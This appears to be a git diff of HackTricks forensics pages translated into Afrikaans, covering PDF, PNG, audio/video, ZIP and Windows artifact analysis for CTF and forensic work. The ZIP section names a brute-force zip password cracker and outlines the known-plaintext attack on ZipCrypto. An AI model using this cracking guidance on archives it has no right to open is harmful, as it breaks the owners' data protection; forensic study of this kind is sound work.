For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
Vir aangepaste PDF-ontleding kan Python-biblioteke soos [PeepDF](https://github.com/jesparza/peepdf) gebruik word om spesiale ontledingsskripte te skep. Verder is die potensiaal van die PDF vir versteekte data-opberging so groot dat bronne soos die NSA-gids oor PDF-risiko's en teenmaatreëls, alhoewel dit nie meer by sy oorspronklike plek gehuisves word nie, steeds waardevolle insigte bied. 'n [Afskrif van die gids](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) en 'n versameling [PDF-formaat-truuks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) deur Ange Albertini kan verdere leesstof oor die onderwerp bied.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

38
forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
View file

@ -1,37 +1,33 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies.
**PNG-lêers** word hoog aangeskryf in **CTF-uitdagings** vir hul **verlieslose kompressie**, wat hulle ideaal maak vir die insluiting van verborge data. Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**, wat ingebedde inligting of anomalieë kan onthul.
For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants.
Vir die nagaan van die integriteit van PNG-lêers en die herstel van korrupte lêers, is **pngcheck** 'n noodsaaklike gereedskap wat opdraggelynfunksionaliteit bied om PNG-lêers te valideer en te diagnoseer ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wanneer lêers buite eenvoudige herstel is, bied aanlyn dienste soos [OfficeRecovery se PixRecovery](https://online.officerecovery.com/pixrecovery/) 'n webgebaseerde oplossing vir die herstel van korrupte PNG's, wat kan help om belangrike data vir CTF-deelnemers te herwin.
These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data.
Hierdie strategieë beklemtoon die belang van 'n omvattende benadering in CTF's, waarin 'n kombinasie van analitiese gereedskap en hersteltegnieke gebruik word om verborge of verlore data te ontdek en te herwin.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

44
forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
View file

@ -1,45 +1,41 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types.
**Audio- en videobestandmanipulasie** is 'n kenmerkende aspek in **CTF-forensiese uitdagings**, wat gebruik maak van **steganografie** en metadata-analise om geheime boodskappe te verberg of te onthul. Gereedskap soos **[mediainfo](https://mediaarea.net/en/MediaInfo)** en **`exiftool`** is noodsaaklik vir die ondersoek van lêermetadata en die identifisering van inhoudstipes.
For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files.
Vir klankuitdagings steek **[Audacity](http://www.audacityteam.org/)** uit as 'n voorste gereedskap vir die besigtiging van golfvorme en die analise van spektrogramme, wat noodsaaklik is vir die ontdekking van teks wat in klank gekodeer is. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** word sterk aanbeveel vir gedetailleerde spektrogramanalise. **Audacity** maak klankmanipulasie soos vertraging of omkeer van spore moontlik om verborge boodskappe op te spoor. **[Sox](http://sox.sourceforge.net/)**, 'n opdraglyn-hulpprogram, blink uit in die omskakeling en redigering van klanklêers.
**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**.
**Least Significant Bits (LSB)**-manipulasie is 'n algemene tegniek in klank- en videosteganografie, wat gebruik maak van die vaste-grootte brokkies van mediabestande om data heimlik in te bed. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is nuttig vir die ontsluiting van boodskappe wat versteek is as **DTMF-tone** of **Morsekode**.
Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions.
Videouitdagings behels dikwels houerformate wat klank- en videostrome saambind. **[FFmpeg](http://ffmpeg.org/)** is die go-to-gereedskap vir die analise en manipulasie van hierdie formate, wat in staat is om inhoud te demultipleks en af te speel. Vir ontwikkelaars integreer **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg se vermoëns in Python vir gevorderde skriptbare interaksies.
This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files.
Hierdie verskeidenheid gereedskap beklemtoon die veelsydigheid wat vereis word in CTF-uitdagings, waar deelnemers 'n breë spektrum van analise- en manipulasietegnieke moet gebruik om verborge data binne klank- en videobestande te ontbloot.
## References
## Verwysings
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

48
forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View file

@ -1,44 +1,44 @@
# ZIPs tricks
# ZIP-truuks
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:
**Opdraglynhulpmiddels** vir die bestuur van **zip-lêers** is noodsaaklik vir die diagnose, herstel en kraak van zip-lêers. Hier is 'n paar sleutelhulpprogramme:
- **`unzip`**: Reveals why a zip file may not decompress.
- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.
- **`zipinfo`**: Lists contents of a zip file without extracting them.
- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.
- **`unzip`**: Onthul waarom 'n zip-lêer nie gedekomprimeer kan word nie.
- **`zipdetails -v`**: Bied 'n gedetailleerde analise van die velds van die zip-lêerformaat.
- **`zipinfo`**: Lys die inhoud van 'n zip-lêer sonder om dit uit te pak.
- **`zip -F input.zip --out output.zip`** en **`zip -FF input.zip --out output.zip`**: Probeer om beskadigde zip-lêers te herstel.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: 'n Hulpmiddel vir bruto-kragkraak van zip-wagwoorde, effektief vir wagwoorde tot ongeveer 7 karakters.
The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.
Die [Zip-lêerformaat spesifikasie](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bied omvattende besonderhede oor die struktuur en standaarde van zip-lêers.
It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
Dit is belangrik om daarop te let dat wagwoord-beskermde zip-lêers **nie lêernaam of lêergroottes versleutel nie**, 'n veiligheidsgebrek wat nie gedeel word met RAR- of 7z-lêers wat hierdie inligting versleutel nie. Verder is zip-lêers wat met die ouer ZipCrypto-metode versleutel is, vatbaar vir 'n **platte tekst-aanval** as 'n onversleutelde kopie van 'n saamgedrukte lêer beskikbaar is. Hierdie aanval maak gebruik van die bekende inhoud om die wagwoord van die zip te kraak, 'n kwesbaarheid wat in [HackThis se artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) beskryf word en verder verduidelik word in [hierdie akademiese artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Tog is zip-lêers wat met **AES-256**-versleuteling beveilig is, immuun teen hierdie platte tekst-aanval, wat die belangrikheid van die keuse van veilige versleutelingsmetodes vir sensitiewe data beklemtoon.
## References
## Verwysings
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

528
forensics/basic-forensic-methodology/windows-forensics/README.md
View file

@ -1,526 +1,494 @@
# Windows Artifacts
# Windows Artefakte
## Windows Artifacts
## Windows Artefakte
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Generic Windows Artifacts
## Generiese Windows Artefakte
### Windows 10 Notifications
### Windows 10 Kennisgewings
In the path `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
In die pad `\Users\<gebruikersnaam>\AppData\Local\Microsoft\Windows\Notifications` kan jy die databasis `appdb.dat` (voor Windows-verjaarsdag) of `wpndatabase.db` (na Windows-verjaarsdag) vind.
Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data.
Binne hierdie SQLite-databasis kan jy die `Notification`-tabel vind met al die kennisgewings (in XML-formaat) wat moontlik interessante data kan bevat.
### Timeline
### Tydlyn
Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications.
Tydlyn is 'n Windows-kenmerk wat 'n **chronologiese geskiedenis** van besoekte webbladsye, bewerkte dokumente en uitgevoerde toepassings bied.
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
Die databasis bly in die pad `\Users\<gebruikersnaam>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Hierdie databasis kan geopen word met 'n SQLite-hulpmiddel of met die hulpmiddel [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **wat 2 lêers genereer wat geopen kan word met die hulpmiddel** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
### ADS (Alternate Data Streams)
### ADS (Alternatiewe Datastrome)
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded.
Gedownloade lêers kan die **ADS Zone.Identifier** bevat wat aandui **hoe** dit van die intranet, internet, ens. afgelaai is. Sommige sagteware (soos webblaaier) plaas gewoonlik selfs **meer** **inligting** soos die **URL** waarvandaan die lêer afgelaai is.
## **File Backups**
## **Lêerback-ups**
### Recycle Bin
### Herwinbin
In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\
When a file is deleted in this folder 2 specific files are created:
In Vista/Win7/Win8/Win10 kan die **Herwinbin** in die **`$Recycle.bin`**-map in die hoof van die aandrywing (`C:\$Recycle.bin`) gevind word.\
Wanneer 'n lêer in hierdie map uitgevee word, word 2 spesifieke lêers geskep:
* `$I{id}`: File information (date of when it was deleted}
* `$R{id}`: Content of the file
* `$I{id}`: Lêerinligting (datum van uitvee}
* `$R{id}`: Inhoud van die lêer
![](<../../../.gitbook/assets/image (486).png>)
Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista Win10).
Met hierdie lêers kan jy die hulpmiddel [**Rifiuti**](https://github.com/abelcheung/rifiuti2) gebruik om die oorspronklike adres van die uitgevee lêers en die datum waarop dit uitgevee is, te kry (gebruik `rifiuti-vista.exe` vir Vista - Win10).
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
### Volume Shadow Copies
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
Shadow Copy is 'n tegnologie wat ingesluit is in Microsoft Windows wat **back-up kopieë** of afskrifte van rekenaar lêers of volumes kan skep, selfs wanneer hulle in gebruik is.
